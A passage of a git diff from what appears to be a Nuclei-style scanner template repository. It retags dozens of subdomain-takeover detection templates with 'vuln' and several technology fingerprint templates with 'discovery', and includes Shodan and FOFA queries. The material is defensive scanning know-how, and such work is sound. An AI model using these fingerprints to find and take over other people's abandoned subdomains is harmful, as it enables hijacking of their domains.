b/http/takeovers/bitbucket-takeover.yaml index 6b5263d45e9..4b433b9081a 100644 --- a/http/takeovers/bitbucket-takeover.yaml +++ b/http/takeovers/bitbucket-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/campaignmonitor-takeover.yaml b/http/takeovers/campaignmonitor-takeover.yaml index 71846316215..b0753675020 100644 --- a/http/takeovers/campaignmonitor-takeover.yaml +++ b/http/takeovers/campaignmonitor-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/275 metadata: max-request: 1 - tags: takeover,campaignmonitor + tags: takeover,campaignmonitor,vuln http: - method: GET diff --git a/http/takeovers/canny-takeover.yaml b/http/takeovers/canny-takeover.yaml index 10b0cc2bd83..42b13b33ed2 100644 --- a/http/takeovers/canny-takeover.yaml +++ b/http/takeovers/canny-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/114 metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/cargo-takeover.yaml b/http/takeovers/cargo-takeover.yaml index f2db2743307..6ddd3706e80 100644 --- a/http/takeovers/cargo-takeover.yaml +++ b/http/takeovers/cargo-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/cargocollective-takeover.yaml b/http/takeovers/cargocollective-takeover.yaml index 7482c236ea4..d3427ba63e9 100644 --- a/http/takeovers/cargocollective-takeover.yaml +++ b/http/takeovers/cargocollective-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/152 metadata: max-request: 1 - tags: takeover,cargocollective + tags: takeover,cargocollective,vuln http: - method: GET diff --git a/http/takeovers/clever-takeover.yaml b/http/takeovers/clever-takeover.yaml index 010535fe851..2fb22638b9a 100644 --- a/http/takeovers/clever-takeover.yaml +++ b/http/takeovers/clever-takeover.yaml @@ -9,7 +9,7 @@ info: - https://supras.io/new-subdomain-takeover-case-clever-cloud/ metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/flexbe-takeover.yaml b/http/takeovers/flexbe-takeover.yaml index 3c6b80867ac..edf85fdbaa5 100644 --- a/http/takeovers/flexbe-takeover.yaml +++ b/http/takeovers/flexbe-takeover.yaml @@ -10,7 +10,7 @@ info: - https://help.flexbe.com/domains/ metadata: max-request: 1 - tags: takeover,flexbe + tags: takeover,flexbe,vuln http: - method: GET diff --git a/http/takeovers/framer-takeover.yaml b/http/takeovers/framer-takeover.yaml index 3593a847d5b..5e91b98ee02 100644 --- a/http/takeovers/framer-takeover.yaml +++ b/http/takeovers/framer-takeover.yaml @@ -12,7 +12,7 @@ info: max-request: 1 shodan-query: html:"Site Not Found | Framer" fofa-query: body="Site Not Found | Framer" - tags: takeover,framer + tags: takeover,framer,vuln http: - method: GET diff --git a/http/takeovers/frontify-takeover.yaml b/http/takeovers/frontify-takeover.yaml index 7bd88a61516..501fb26acaf 100644 --- a/http/takeovers/frontify-takeover.yaml +++ b/http/takeovers/frontify-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/170 metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/gemfury-takeover.yaml b/http/takeovers/gemfury-takeover.yaml index 23e041335e9..39289329ddd 100644 --- a/http/takeovers/gemfury-takeover.yaml +++ b/http/takeovers/gemfury-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/154 metadata: max-request: 1 - tags: takeover,gemfury + tags: takeover,gemfury,vuln http: - method: GET diff --git a/http/takeovers/getresponse-takeover.yaml b/http/takeovers/getresponse-takeover.yaml index b012fff18c9..13fc265245d 100644 --- a/http/takeovers/getresponse-takeover.yaml +++ b/http/takeovers/getresponse-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/235 metadata: max-request: 1 - tags: takeover,getresponse + tags: takeover,getresponse,vuln http: - method: GET diff --git a/http/takeovers/ghost-takeover.yaml b/http/takeovers/ghost-takeover.yaml index ed436470771..15ebd20fbf1 100644 --- a/http/takeovers/ghost-takeover.yaml +++ b/http/takeovers/ghost-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/89 metadata: max-request: 1 - tags: takeover,ghost + tags: takeover,ghost,vuln http: - method: GET diff --git a/http/takeovers/gitbook-takeover.yaml b/http/takeovers/gitbook-takeover.yaml index 35aeff88c68..9e392a7986b 100644 --- a/http/takeovers/gitbook-takeover.yaml +++ b/http/takeovers/gitbook-takeover.yaml @@ -10,7 +10,7 @@ info: - https://hackerone.com/reports/223625 metadata: max-request: 1 - tags: takeover,gitbook,hackerone + tags: takeover,gitbook,hackerone,vuln http: - method: GET diff --git a/http/takeovers/github-takeover.yaml b/http/takeovers/github-takeover.yaml index 65c858b24de..f094b6a0193 100644 --- a/http/takeovers/github-takeover.yaml +++ b/http/takeovers/github-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover,github + tags: takeover,github,vuln http: - method: GET diff --git a/http/takeovers/gohire-takeover.yaml b/http/takeovers/gohire-takeover.yaml index 3de1349d732..a9fdfc5746e 100644 --- a/http/takeovers/gohire-takeover.yaml +++ b/http/takeovers/gohire-takeover.yaml @@ -8,7 +8,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/403 metadata: max-request: 1 - tags: takeover,gohire + tags: takeover,gohire,vuln http: - method: GET diff --git a/http/takeovers/greatpages-takeover.yaml b/http/takeovers/greatpages-takeover.yaml index c7d6ccca3c3..e86c43d7d4f 100644 --- a/http/takeovers/greatpages-takeover.yaml +++ b/http/takeovers/greatpages-takeover.yaml @@ -12,7 +12,7 @@ info: verified: true fofa-query: cname="cname.greatpages.com.br" max-request: 1 - tags: takeover,greatpages + tags: takeover,greatpages,vuln http: - method: GET diff --git a/http/takeovers/hatenablog-takeover.yaml b/http/takeovers/hatenablog-takeover.yaml index f3430a1d8e2..0ee089b19d5 100644 --- a/http/takeovers/hatenablog-takeover.yaml +++ b/http/takeovers/hatenablog-takeover.yaml @@ -10,7 +10,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover,hatenablog + tags: takeover,hatenablog,vuln http: - method: GET diff --git a/http/takeovers/helpdocs-takeover.yaml b/http/takeovers/helpdocs-takeover.yaml index bdfb172a633..0b439571b0a 100644 --- a/http/takeovers/helpdocs-takeover.yaml +++ b/http/takeovers/helpdocs-takeover.yaml @@ -8,7 +8,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/402 metadata: max-request: 1 - tags: takeover,helpdocs + tags: takeover,helpdocs,vuln http: - method: GET diff --git a/http/takeovers/helpjuice-takeover.yaml b/http/takeovers/helpjuice-takeover.yaml index 4d48a9c534d..d38cca7c850 100644 --- a/http/takeovers/helpjuice-takeover.yaml +++ b/http/takeovers/helpjuice-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/helprace-takeover.yaml b/http/takeovers/helprace-takeover.yaml index 2fd45ecf885..74296730528 100644 --- a/http/takeovers/helprace-takeover.yaml +++ b/http/takeovers/helprace-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/115 metadata: max-request: 1 - tags: takeover,helprace + tags: takeover,helprace,vuln http: - method: GET diff --git a/http/takeovers/helpscout-takeover.yaml b/http/takeovers/helpscout-takeover.yaml index 508f40b65b6..93e8002da8a 100644 --- a/http/takeovers/helpscout-takeover.yaml +++ b/http/takeovers/helpscout-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/hubspot-takeover.yaml b/http/takeovers/hubspot-takeover.yaml index ea58415fbc6..c5bf512d91a 100644 --- a/http/takeovers/hubspot-takeover.yaml +++ b/http/takeovers/hubspot-takeover.yaml @@ -10,7 +10,7 @@ info: - https://hackerone.com/reports/335330 metadata: max-request: 1 - tags: takeover,hubspot,hackerone + tags: takeover,hubspot,hackerone,vuln http: - method: GET diff --git a/http/takeovers/intercom-takeover.yaml b/http/takeovers/intercom-takeover.yaml index 300e9287064..e82d6c2ef0b 100644 --- a/http/takeovers/intercom-takeover.yaml +++ b/http/takeovers/intercom-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/69 metadata: max-request: 1 - tags: takeover,intercom + tags: takeover,intercom,vuln http: - method: GET diff --git a/http/takeovers/jazzhr-takeover.yaml b/http/takeovers/jazzhr-takeover.yaml index aabc504ab14..c9e247a9491 100644 --- a/http/takeovers/jazzhr-takeover.yaml +++ b/http/takeovers/jazzhr-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/jetbrains-takeover.yaml b/http/takeovers/jetbrains-takeover.yaml index 5ed953f06bc..1c71179f036 100644 --- a/http/takeovers/jetbrains-takeover.yaml +++ b/http/takeovers/jetbrains-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/pull/107 metadata: max-request: 1 - tags: takeover,jetbrains + tags: takeover,jetbrains,vuln http: - method: GET diff --git a/http/takeovers/kinsta-takeover.yaml b/http/takeovers/kinsta-takeover.yaml index f27cb2eb236..ec6483c85e0 100644 --- a/http/takeovers/kinsta-takeover.yaml +++ b/http/takeovers/kinsta-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/launchrock-takeover.yaml b/http/takeovers/launchrock-takeover.yaml index cb4cd867b49..48947c8beb2 100644 --- a/http/takeovers/launchrock-takeover.yaml +++ b/http/takeovers/launchrock-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/74 metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/leadpages-takeover.yaml b/http/takeovers/leadpages-takeover.yaml index 7ddf74f1ebb..2a528beb788 100644 --- a/http/takeovers/leadpages-takeover.yaml +++ b/http/takeovers/leadpages-takeover.yaml @@ -11,7 +11,7 @@ info: - https://github.com/PushpenderIndia/subdover/issues/2 metadata: max-request: 1 - tags: takeover,leadpages + tags: takeover,leadpages,vuln http: - method: GET diff --git a/http/takeovers/mashery-takeover.yaml b/http/takeovers/mashery-takeover.yaml index 91c2914f076..94dc2ca2fde 100644 --- a/http/takeovers/mashery-takeover.yaml +++ b/http/takeovers/mashery-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/14 metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/meteor-takeover.yaml b/http/takeovers/meteor-takeover.yaml index 5effd68b171..44c43ebe99f 100644 --- a/http/takeovers/meteor-takeover.yaml +++ b/http/takeovers/meteor-takeover.yaml @@ -10,7 +10,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/321 metadata: max-request: 1 - tags: takeover,meteor + tags: takeover,meteor,vuln http: - method: GET diff --git a/http/takeovers/netlify-takeover.yaml b/http/takeovers/netlify-takeover.yaml index 5bc2d7f9806..edb9c84731a 100644 --- a/http/takeovers/netlify-takeover.yaml +++ b/http/takeovers/netlify-takeover.yaml @@ -11,7 +11,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/pull/289 metadata: max-request: 1 - tags: takeover,netlify + tags: takeover,netlify,vuln http: - method: GET diff --git a/http/takeovers/ngrok-takeover.yaml b/http/takeovers/ngrok-takeover.yaml index d6da4ceba8c..fdbecb0732d 100644 --- a/http/takeovers/ngrok-takeover.yaml +++ b/http/takeovers/ngrok-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/92 metadata: max-request: 1 - tags: takeover,ngrok + tags: takeover,ngrok,vuln http: - method: GET diff --git a/http/takeovers/pagewiz-takeover.yaml b/http/takeovers/pagewiz-takeover.yaml index 16346219134..ff3320be19e 100644 --- a/http/takeovers/pagewiz-takeover.yaml +++ b/http/takeovers/pagewiz-takeover.yaml @@ -9,7 +9,7 @@ info: - https://help.pagewiz.com/hc/en-us/articles/115005391465-Page-URL metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/pantheon-takeover.yaml b/http/takeovers/pantheon-takeover.yaml index bb6a06c63e6..308d1577ac3 100644 --- a/http/takeovers/pantheon-takeover.yaml +++ b/http/takeovers/pantheon-takeover.yaml @@ -10,7 +10,7 @@ info: - https://medium.com/bug-bounty/how-i-took-over-several-stanford-subdomains-also-let-me-explain-you-the-pain-to-report-it-d84b08704be8 metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/pingdom-takeover.yaml b/http/takeovers/pingdom-takeover.yaml index 8d86140a499..631c28d30b9 100644 --- a/http/takeovers/pingdom-takeover.yaml +++ b/http/takeovers/pingdom-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/144 metadata: max-request: 1 - tags: takeover,pingdom + tags: takeover,pingdom,vuln http: - method: GET diff --git a/http/takeovers/proposify-takeover.yaml b/http/takeovers/proposify-takeover.yaml index 14b70d55a12..5d50b6d65f2 100644 --- a/http/takeovers/proposify-takeover.yaml +++ b/http/takeovers/proposify-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/readme-takeover.yaml b/http/takeovers/readme-takeover.yaml index 242a2a4ab0e..8b90952b759 100644 --- a/http/takeovers/readme-takeover.yaml +++ b/http/takeovers/readme-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/41 metadata: max-request: 1 - tags: takeover,readme + tags: takeover,readme,vuln http: - method: GET diff --git a/http/takeovers/readthedocs-takeover.yaml b/http/takeovers/readthedocs-takeover.yaml index f0d0469a261..06d7401924f 100644 --- a/http/takeovers/readthedocs-takeover.yaml +++ b/http/takeovers/readthedocs-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/160 metadata: max-request: 1 - tags: takeover,readthedocs + tags: takeover,readthedocs,vuln http: - method: GET diff --git a/http/takeovers/redirect-pizza-takeover.yaml b/http/takeovers/redirect-pizza-takeover.yaml index 397c762e076..dc31c5352af 100644 --- a/http/takeovers/redirect-pizza-takeover.yaml +++ b/http/takeovers/redirect-pizza-takeover.yaml @@ -11,7 +11,7 @@ info: max-request: 1 shodan-query: html:"redirect.pizza" fofa-query: body="redirect.pizza" - tags: takeover,redirect-pizza + tags: takeover,redirect-pizza,vuln http: - method: GET diff --git a/http/takeovers/shopify-takeover.yaml b/http/takeovers/shopify-takeover.yaml index 20d8bbe5728..d7f8e5c7d3b 100644 --- a/http/takeovers/shopify-takeover.yaml +++ b/http/takeovers/shopify-takeover.yaml @@ -12,7 +12,7 @@ info: - https://hackerone.com/reports/1711890 metadata: max-request: 1 - tags: takeover,hackerone + tags: takeover,hackerone,vuln http: - method: GET diff --git a/http/takeovers/short-io.yaml b/http/takeovers/short-io.yaml index c9c57d60f22..68488a6b71a 100644 --- a/http/takeovers/short-io.yaml +++ b/http/takeovers/short-io.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/260 metadata: max-request: 1 - tags: takeover,short.io + tags: takeover,short.io,vuln http: - method: GET diff --git a/http/takeovers/simplebooklet-takeover.yaml b/http/takeovers/simplebooklet-takeover.yaml index 96c4cde69b0..0dee8340af7 100644 --- a/http/takeovers/simplebooklet-takeover.yaml +++ b/http/takeovers/simplebooklet-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/smartjob-takeover.yaml b/http/takeovers/smartjob-takeover.yaml index cd3b8b3e0bb..ec38444167e 100644 --- a/http/takeovers/smartjob-takeover.yaml +++ b/http/takeovers/smartjob-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/139 metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/smugmug-takeover.yaml b/http/takeovers/smugmug-takeover.yaml index 89213d58fab..8a2ba09ba51 100644 --- a/http/takeovers/smugmug-takeover.yaml +++ b/http/takeovers/smugmug-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/60 metadata: max-request: 1 - tags: takeover,smugmug + tags: takeover,smugmug,vuln http: - method: GET diff --git a/http/takeovers/softr-takeover.yaml b/http/takeovers/softr-takeover.yaml index 54f7615b521..c3c92f3ace0 100644 --- a/http/takeovers/softr-takeover.yaml +++ b/http/takeovers/softr-takeover.yaml @@ -9,7 +9,7 @@ info: - https://docs.softr.io/custom-domain-and-publishing/9qTmU2Lj8Gnpr1Ue6dEAkX/add-a-custom-domain-to-your-app/93K5bLJN3n91MRo9uRGdAf metadata: max-request: 1 - tags: takeover,softr + tags: takeover,softr,vuln http: - method: GET diff --git a/http/takeovers/sprintful-takeover.yaml b/http/takeovers/sprintful-takeover.yaml index 515345bd566..cf4fddf38f6 100644 --- a/http/takeovers/sprintful-takeover.yaml +++ b/http/takeovers/sprintful-takeover.yaml @@ -7,7 +7,7 @@ info: description: Sprintful takeover was detected. metadata: max-request: 1 - tags: takeover,sprintful + tags: takeover,sprintful,vuln http: - method: GET diff --git a/http/takeovers/squadcast-takeover.yaml b/http/takeovers/squadcast-takeover.yaml index 69a8de1f058..5be586828b9 100644 --- a/http/takeovers/squadcast-takeover.yaml +++ b/http/takeovers/squadcast-takeover.yaml @@ -8,7 +8,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/398 metadata: max-request: 1 - tags: takeover,squadcast + tags: takeover,squadcast,vuln http: - method: GET diff --git a/http/takeovers/strikingly-takeover.yaml b/http/takeovers/strikingly-takeover.yaml index c55f2a9f4de..b1dd9162508 100644 --- a/http/takeovers/strikingly-takeover.yaml +++ b/http/takeovers/strikingly-takeover.yaml @@ -10,7 +10,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/58 metadata: max-request: 1 - tags: takeover,strikingly + tags: takeover,strikingly,vuln http: - method: GET diff --git a/http/takeovers/surge-takeover.yaml b/http/takeovers/surge-takeover.yaml index 25ad82f4ecc..5cf2329746a 100644 --- a/http/takeovers/surge-takeover.yaml +++ b/http/takeovers/surge-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/198 metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/surveygizmo-takeover.yaml b/http/takeovers/surveygizmo-takeover.yaml index 1307a2ff8d3..85b774bcedc 100644 --- a/http/takeovers/surveygizmo-takeover.yaml +++ b/http/takeovers/surveygizmo-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/surveysparrow-takeover.yaml b/http/takeovers/surveysparrow-takeover.yaml index 42f12efa051..b4f2e37521a 100644 --- a/http/takeovers/surveysparrow-takeover.yaml +++ b/http/takeovers/surveysparrow-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/281 metadata: max-request: 1 - tags: takeover,surveysparrow + tags: takeover,surveysparrow,vuln http: - method: GET diff --git a/http/takeovers/tave-takeover.yaml b/http/takeovers/tave-takeover.yaml index a00f5ac9e79..d37a48a413c 100644 --- a/http/takeovers/tave-takeover.yaml +++ b/http/takeovers/tave-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/teamwork-takeover.yaml b/http/takeovers/teamwork-takeover.yaml index 5301cde02b5..04b68dd54b9 100644 --- a/http/takeovers/teamwork-takeover.yaml +++ b/http/takeovers/teamwork-takeover.yaml @@ -7,7 +7,7 @@ info: description: Teamwork takeover was detected. metadata: max-request: 1 - tags: takeover,teamwork + tags: takeover,teamwork,vuln http: - method: GET diff --git a/http/takeovers/tilda-takeover.yaml b/http/takeovers/tilda-takeover.yaml index c37f9154fad..f582249c7be 100644 --- a/http/takeovers/tilda-takeover.yaml +++ b/http/takeovers/tilda-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/155 metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/uberflip-takeover.yaml b/http/takeovers/uberflip-takeover.yaml index a331993512d..8e3051431a7 100644 --- a/http/takeovers/uberflip-takeover.yaml +++ b/http/takeovers/uberflip-takeover.yaml @@ -10,7 +10,7 @@ info: - https://hackerone.com/reports/863551 metadata: max-request: 1 - tags: takeover,uberflip,hackerone + tags: takeover,uberflip,hackerone,vuln http: - method: GET diff --git a/http/takeovers/uptime-takeover.yaml b/http/takeovers/uptime-takeover.yaml index 966f404b4e6..813b716ca6e 100644 --- a/http/takeovers/uptime-takeover.yaml +++ b/http/takeovers/uptime-takeover.yaml @@ -8,7 +8,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/368 metadata: max-request: 1 - tags: takeover,uptime + tags: takeover,uptime,vuln http: - method: GET diff --git a/http/takeovers/uptimerobot-takeover.yaml b/http/takeovers/uptimerobot-takeover.yaml index 3607c08ad4f..98157eb44c7 100644 --- a/http/takeovers/uptimerobot-takeover.yaml +++ b/http/takeovers/uptimerobot-takeover.yaml @@ -10,7 +10,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/45 metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/uservoice-takeover.yaml b/http/takeovers/uservoice-takeover.yaml index 1725535a303..8dd5e05bea3 100644 --- a/http/takeovers/uservoice-takeover.yaml +++ b/http/takeovers/uservoice-takeover.yaml @@ -10,7 +10,7 @@ info: - https://hackerone.com/reports/269109 metadata: max-request: 1 - tags: takeover,uservoice,hackerone + tags: takeover,uservoice,hackerone,vuln http: - method: GET diff --git a/http/takeovers/vend-takeover.yaml b/http/takeovers/vend-takeover.yaml index 20a6e0e4aea..8865376ad89 100644 --- a/http/takeovers/vend-takeover.yaml +++ b/http/takeovers/vend-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/wasabi-bucket-takeover.yaml b/http/takeovers/wasabi-bucket-takeover.yaml index 96d89612df7..8011cabec87 100644 --- a/http/takeovers/wasabi-bucket-takeover.yaml +++ b/http/takeovers/wasabi-bucket-takeover.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: "wasabis3" - tags: takeover,wasabi,bucket + tags: takeover,wasabi,bucket,vuln http: - method: GET diff --git a/http/takeovers/wishpond-takeover.yaml b/http/takeovers/wishpond-takeover.yaml index f8499de6d04..f1dd3922b87 100644 --- a/http/takeovers/wishpond-takeover.yaml +++ b/http/takeovers/wishpond-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover,wishpond + tags: takeover,wishpond,vuln http: - method: GET diff --git a/http/takeovers/wix-takeover.yaml b/http/takeovers/wix-takeover.yaml index 18600aab595..a7631089933 100644 --- a/http/takeovers/wix-takeover.yaml +++ b/http/takeovers/wix-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/231 metadata: max-request: 1 - tags: takeover,wix + tags: takeover,wix,vuln http: - method: GET diff --git a/http/takeovers/wordpress-takeover.yaml b/http/takeovers/wordpress-takeover.yaml index 1e1ed22275d..affeab79fb7 100644 --- a/http/takeovers/wordpress-takeover.yaml +++ b/http/takeovers/wordpress-takeover.yaml @@ -10,7 +10,7 @@ info: - https://hackerone.com/reports/274336 metadata: max-request: 1 - tags: takeover,wordpress,hackerone + tags: takeover,wordpress,hackerone,vuln http: - method: GET diff --git a/http/takeovers/worksites-takeover.yaml b/http/takeovers/worksites-takeover.yaml index fc8cffe7575..55706f62553 100644 --- a/http/takeovers/worksites-takeover.yaml +++ b/http/takeovers/worksites-takeover.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 2 - tags: takeover,dns + tags: takeover,dns,vuln dns: - name: "{{FQDN}}" diff --git a/http/takeovers/wufoo-takeover.yaml b/http/takeovers/wufoo-takeover.yaml index 13daf7534c2..2e2312913f1 100644 --- a/http/takeovers/wufoo-takeover.yaml +++ b/http/takeovers/wufoo-takeover.yaml @@ -9,7 +9,7 @@ info: - https://github.com/EdOverflow/can-i-take-over-xyz metadata: max-request: 1 - tags: takeover + tags: takeover,vuln http: - method: GET diff --git a/http/takeovers/zendesk-takeover.yaml b/http/takeovers/zendesk-takeover.yaml index 1dfa851d3d5..ced4c0e0502 100644 --- a/http/takeovers/zendesk-takeover.yaml +++ b/http/takeovers/zendesk-takeover.yaml @@ -11,7 +11,7 @@ info: - https://hackerone.com/reports/759454 metadata: max-request: 1 - tags: takeover,zendesk,hackerone + tags: takeover,zendesk,hackerone,vuln http: - method: GET diff --git a/http/technologies/4D-detect.yaml b/http/technologies/4D-detect.yaml index e236bc03321..c65996ca791 100644 --- a/http/technologies/4D-detect.yaml +++ b/http/technologies/4D-detect.yaml @@ -17,7 +17,7 @@ info: vendor: 4d product: 4d shodan-query: http.html:"4DACTION/" - tags: 4D,detect,tech + tags: 4D,detect,tech,discovery http: - method: GET diff --git a/http/technologies/abyss-web-server.yaml b/http/technologies/abyss-web-server.yaml index d363a8efc15..d455680b48e 100644 --- a/http/technologies/abyss-web-server.yaml +++ b/http/technologies/abyss-web-server.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 fofa-query: app="Abyss-Web-Server" - tags: tech + tags: tech,discovery http: - method: GET diff --git a/http/technologies/accellion-detect.yaml b/http/technologies/accellion-detect.yaml index f2eac6d71f2..a23a5459978 100644 --- a/http/technologies/accellion-detect.yaml +++ b/http/technologies/accellion-detect.yaml @@ -1,32 +1,32 @@ -id: accellion-detect - -info: - name: Accellion - Detect - author: rxerium - severity: info - description: | - Dectection of Accellion File Transfer Appliance. - metadata: - verified: true - max-request: 1 - shodan-query: html:"/cfadmin/img/" - tags: accellion,tech,detect - -http: - - method: GET - path: - - "{{BaseURL}}/cfadmin/" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '/cfadmin/img/accellion-logo.png' - - 'secured by accellion' - condition: or - - - type: status - status: +id: accellion-detect + +info: + name: Accellion - Detect + author: rxerium + severity: info + description: | + Dectection of Accellion File Transfer Appliance. + metadata: + verified: true + max-request: 1 + shodan-query: html:"/cfadmin/img/" + tags: accellion,tech,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/cfadmin/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '/cfadmin/img/accellion-logo.png' + - 'secured by accellion' + condition: or + + - type: status + status: - 200 # digest: 4b0a00483046022100e3f3df7636379fd81976a57b15c535339dce8209464781e008050f49184d25fc022100fdb9a0c06e74a493a8773ee130d94a2f94903c8eb86958de56ba0d584e5e7ae1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/acontent-detect.yaml b/http/technologies/acontent-detect.yaml index 611257e2548..b4328d22154 100644 --- a/http/technologies/acontent-detect.yaml +++ b/http/technologies/acontent-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,acontent + tags: tech,acontent,discovery http: - method: GET diff --git a/http/technologies/activecollab-detect.yaml b/http/technologies/activecollab-detect.yaml index 50114b3cff3..5c43d7eeb8e 100644 --- a/http/technologies/activecollab-detect.yaml +++ b/http/technologies/activecollab-detect.yaml @@ -11,7 +11,7 @@ info: vendor: activecollab product: activecollab fofa-query: app="ActiveCollab" - tags: acsoft,tech,activecollab + tags: acsoft,tech,activecollab,discovery http: - method: GET diff --git a/http/technologies/adfs-detect.yaml b/http/technologies/adfs-detect.yaml index bb767c62e7c..46abc0f9c67 100644 --- a/http/technologies/adfs-detect.yaml +++ b/http/technologies/adfs-detect.yaml @@ -7,7 +7,7 @@ info: description: Detects ADFS with forms-based authentication enabled. metadata: max-request: 1 - tags: tech,adfs + tags: tech,adfs,discovery http: - method: GET diff --git a/http/technologies/admiralcloud-detect.yaml b/http/technologies/admiralcloud-detect.yaml index 667fc6cbb5a..427ff872cb4 